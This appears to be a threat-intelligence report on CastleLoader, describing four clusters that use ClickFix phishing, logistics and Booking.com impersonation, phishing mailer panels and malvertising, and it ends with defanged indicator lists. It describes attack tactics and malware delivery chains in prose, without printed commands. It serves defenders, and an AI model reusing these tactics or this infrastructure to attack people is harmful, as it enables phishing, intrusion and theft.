Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.

Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.

Activity Clusters

Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.

Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.

Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160

Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.

Attack Flow

Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.

Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)

The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.

The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.

Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)

Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.

Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)

After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.

Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)

By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.

Figure 9: ClickFix command (Source: Recorded Future)

Use of Compromised Infrastructure

As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.

Infrastructure Analysis

Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.

Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.

Domain Re-Registration Tactic

Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. Figure 10 provides two examples of this activity.

Figure 10: Re-registration of logistics-themed domains (Source: Recorded Future)

Notably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for Hometown Logistics LLC in 2021 (see Figure 11).

Figure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)

Public Complaints and Suspected Access to DAT and Loadlink

Some of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the domain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several respondents indicated they did not believe it to be legitimate.

Figure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)

While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.

In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight & Analytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see Figure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.

Figure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)

Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, maritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).

Figure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)

Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by Insikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com and loadlink[.]ca observed in Recorded Future Identity Intelligence.

Figure 15: Account information linked to TAG-160 (Source: Recorded Future)

Access to platforms like DAT Freight & Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.

Possible Overlap with September 2024 Campaign

In September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight & Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.

While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight & Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).

Notably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.

Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161

Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.

Matanbuchus Activity and Booking.com-Themed Infrastructure

Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see Figure 16).

Figure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)

Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the DNS-based version.

Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2 server at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and nimbusvaults[.]com.

Additional Booking.com-Themed Infrastructure

By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.

Phishing Email Management Tooling

By analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.

Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)

The first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.

Figure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)

Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.

Additionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly identified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in Appendix E.

Website 2: Email Manager (“Менеджер Email”)

The second website, hosted on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address, bred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.

Figure 18: Page linked to “Email Manager” tool (Source: Recorded Future)

Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)

The third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: [identifier].[base_name].[main_domain].

Figure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)

The domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within the DOM.

Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in Table 1.

Table 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)

Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.

Table 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)

ASN Cluster Possibly Linked to Bearhost

Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.

Infrastructure Similarities with TAG-157 (RefBroker)

Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.

Cluster 3: Booking.com Impersonation Activity

Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.

Infrastructure Analysis

Insikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (update.exe) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.

Figure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)

At the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.

Figure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)

When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (1, 2). Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.

Cluster 4: Malvertising and Fake Software

Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.

Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.

The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.

Possible Connection to Exploit Forum User Sparja

Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).

Figure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)

Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.

On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.

Figure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)

Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.

Figure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)

A related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.

The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.

On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.

While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.

Victimology

Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.

Mitigations

• Leverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.
• Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.

Outlook

As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.

Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.

Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: CastleLoader C2 Servers

(Source: Recorded Future)

Appendix B: Additional Infrastructure Likely Linked to CastleLoader

(Source: Recorded Future)

Appendix C: Logistics-Themed Infrastructure Used by TAG-160

(Source: Recorded Future)

Appendix D: Booking.com-Themed Domains Linked to TAG-161

(Source: Recorded Future)

Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool

(Source: Recorded Future)

Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains

(Source: Recorded Future)

Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3

(Source: Recorded Future)

Appendix H: Indicators of Compromise (IoCs)

CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
